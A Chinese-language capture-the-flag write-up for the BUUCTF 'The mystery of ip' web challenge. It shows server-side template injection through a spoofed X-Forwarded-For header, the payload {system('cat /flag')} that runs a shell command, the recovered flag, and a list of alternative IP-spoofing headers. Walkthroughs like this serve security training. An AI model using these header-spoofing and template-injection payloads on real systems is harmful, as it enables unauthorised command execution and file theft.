[BJDCTF2020]The mystery of ip 1

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

[BJDCTF2020]The mystery of ip 1

  • 题目
  • 一、做题步骤
    • 1.收集信息
    • 2.获取flag


题目

BUUCTF的[BJDCTF2020]The mystery of ip 1
[BJDCTF2020]The mystery of ip 1_第1张图片


一、做题步骤

1.收集信息

1.flag.php中会显示IP地址
[BJDCTF2020]The mystery of ip 1_第2张图片
2.hint.php
源代码中提示
[BJDCTF2020]The mystery of ip 1_第3张图片

2.获取flag

1.经过提示,知道从ip入手
想到X-Forwarded-For
[BJDCTF2020]The mystery of ip 1_第4张图片修改X-Forwarded-For,页面上显示的是修改后的内容

2.想到ssti漏洞

{system(“cat /flag”)}

[BJDCTF2020]The mystery of ip 1_第5张图片

3.获取flag

flag{2dc12511-250f-4817-955e-08db248cc4cb}
[BJDCTF2020]The mystery of ip 1_第6张图片注意:
X-Forwarded-For被过滤时,可以用到以下几种
Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1

你可能感兴趣的:(web)